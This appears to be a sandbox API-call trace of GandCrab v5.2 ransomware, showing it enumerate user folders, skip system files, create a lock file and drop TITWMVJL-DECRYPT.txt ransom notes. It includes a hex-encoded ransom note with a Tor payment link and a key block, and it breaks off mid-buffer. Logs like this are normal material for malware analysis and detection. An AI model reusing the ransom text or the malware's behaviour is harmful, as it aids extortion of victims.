1 [0096.409] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.410] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Music\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\Music\\TITWMVJL-DECRYPT.txt" [0096.410] lstrlenW (lpString=".titwmvjl") returned 9 [0096.410] lstrlenW (lpString="C:\\Users\\Default\\Music\\TITWMVJL-DECRYPT.txt") returned 43 [0096.410] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.410] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Music\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 52 [0096.410] lstrlenW (lpString="C:\\Users\\Default\\Music\\TITWMVJL-DECRYPT.txt") returned 43 [0096.410] lstrlenW (lpString=".txt") returned 4 [0096.410] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.410] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.410] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.410] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.410] lstrlenW (lpString="C:\\Users\\Default\\Music\\TITWMVJL-DECRYPT.txt") returned 43 [0096.410] lstrlenW (lpString="C:\\Users\\Default\\Music\\TITWMVJL-DECRYPT.txt") returned 43 [0096.410] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.410] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.410] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.410] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.410] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.410] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.410] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.410] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.410] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.411] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.411] FindClose (in: hFindFile=0x5031f8 | out: hFindFile=0x5031f8) returned 1 [0096.411] CloseHandle (hObject=0x230) returned 1 [0096.411] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.411] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0096.411] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0096.411] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="My Documents" | out: lpString1="C:\\Users\\Default\\My Documents") returned="C:\\Users\\Default\\My Documents" [0096.411] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\My Documents\\") returned="C:\\Users\\Default\\My Documents\\" [0096.411] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.412] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.412] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.412] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.412] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.412] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.412] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.413] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\My Documents\\\\TITWMVJL-DECRYPT.txt") returned 51 [0096.413] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\my documents\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0096.413] GetLastError () returned 0x50 [0096.413] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.413] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.413] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x2d3)) [0096.413] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.414] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.414] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.414] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\My Documents\\d2ca4a09d2ca4deb61a.lock") returned 54 [0096.414] CreateFileW (lpFileName="C:\\Users\\Default\\My Documents\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\my documents\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.414] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.414] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.414] lstrlenW (lpString="C:\\Users\\Default\\My Documents\\") returned 30 [0096.415] lstrcatW (in: lpString1="C:\\Users\\Default\\My Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\My Documents\\*") returned="C:\\Users\\Default\\My Documents\\*" [0096.415] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\My Documents\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.415] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.415] CloseHandle (hObject=0x230) returned 1 [0096.415] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.415] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0096.415] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0096.415] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NetHood" | out: lpString1="C:\\Users\\Default\\NetHood") returned="C:\\Users\\Default\\NetHood" [0096.415] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\NetHood\\") returned="C:\\Users\\Default\\NetHood\\" [0096.415] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.415] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.415] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.416] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.416] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.416] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.416] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.416] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.416] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.416] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.416] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\NetHood\\\\TITWMVJL-DECRYPT.txt") returned 46 [0096.416] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\nethood\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.418] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\